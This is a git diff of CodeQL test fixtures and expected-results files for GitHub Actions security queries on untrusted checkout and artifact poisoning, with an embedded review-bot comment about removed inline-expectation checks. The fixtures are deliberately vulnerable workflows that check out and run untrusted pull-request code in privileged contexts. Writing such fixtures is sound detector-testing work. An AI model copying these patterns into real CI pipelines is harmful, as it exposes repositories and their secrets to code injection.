@@ -23,10 +23,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint # $ Sink[actions/untrusted-checkout/critical] + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index 644738a76059..47a0dfc6bd34 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -16,4 +16,4 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} # $ Alert[actions/untrusted-checkout/high] + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index 1001c8549785..0a38be8b12be 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -10,4 +10,4 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./.github/actions/dangerous-git-checkout - - run: yarn test # $ Sink[actions/untrusted-checkout/critical] + - run: yarn test diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index f06228207876..7e154502c139 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -32,20 +32,20 @@ jobs: repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} - - name: Update version minor # $ Alert[actions/untrusted-checkout/critical] + - name: Update version minor if: contains(github.event.comment.body, '/version minor') run: | ./version.sh -u -n echo "BUMP_TYPE=minor" >> $GITHUB_ENV - - name: Update version major # $ Sink[actions/untrusted-checkout/critical] + - name: Update version major if: contains(github.event.comment.body, '/version major') run: | ./version.sh -u -m echo "BUMP_TYPE=major" >> $GITHUB_ENV - - name: Update version patch # $ Sink[actions/untrusted-checkout/critical] + - name: Update version patch if: contains(github.event.comment.body, '/version patch') run: | ./version.sh -u -p - echo "BUMP_TYPE=patch" >> $GITHUB_ENV # $ Sink[actions/untrusted-checkout/critical] + echo "BUMP_TYPE=patch" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml index 145cb77b8298..c802355d102a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/checkout@v2 with: - ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ env.HEAD }} 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml index 3cbd9d698dd7..bcde60f55cb8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/checkout@v2 with: - ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ env.HEAD }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index df0776a8b0f1..3c5f6bf93e98 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -1,22 +1,3 @@ -#select -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | 
@@ -73,3 +54,22 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths +#select +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref index 2f71173a891e..4f8d2af04e8d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-829/ArtifactPoisoningCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/ArtifactPoisoningCritical.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index ef09155ec63c..c0c52e47f5b3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
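Review bot: Removing `postprocess: utils/test/InlineExpectationsTestQuery.ql` from `ArtifactPoisoningCritical.qlref` stops this CWE-829 test from cross-checking the query's alerts against inline expectation comments in the test workflows. The same removal appears in the `ArtifactPoisoningMedium.qlref`, `ArtifactPoisoningPathTraversal.qlref` and `UnpinnedActionsTag.qlref` hunks that follow. The workflow files are not visible here, but if they carry such annotations those become unchecked comments, and a missed or spurious alert would surface only as a change in the `.expected` listing. If the plain-path form is intended, the commit message should say why; otherwise keep the two-key form (`query: Security/CWE-829/ArtifactPoisoningCritical.ql` followed by the `postprocess:` line). Separately, the three ArtifactPoisoning `.qlref` files now end with an added empty line (`+` alone, `@@ -1,2 +1,2 @@`) while `UnpinnedActionsTag.qlref` does not (`@@ -1,2 +1 @@`); one form should be used for all four.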
@@ -1,4 +1,3 @@ -#select edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -55,3 +54,4 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref index 177e1b08095a..39548f274127 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref @@ -1,2 +1,2 @@ -query: Security/CWE-829/ArtifactPoisoningMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-829/ArtifactPoisoningMedium.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref index 4f3bbb90c2a3..17a2059f7e99 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref @@ -1,2 +1,2 @@ -query: experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref index ce9ebe84e530..8c9db66bf6bb 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
@@ -1,2 +1 @@
-query: Security/CWE-829/UnpinnedActionsTag.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-829/UnpinnedActionsTag.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 6f478cfcb14c..52fcecfb9ed7 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -1,43 +1,3 @@ -#select -| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | -| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential 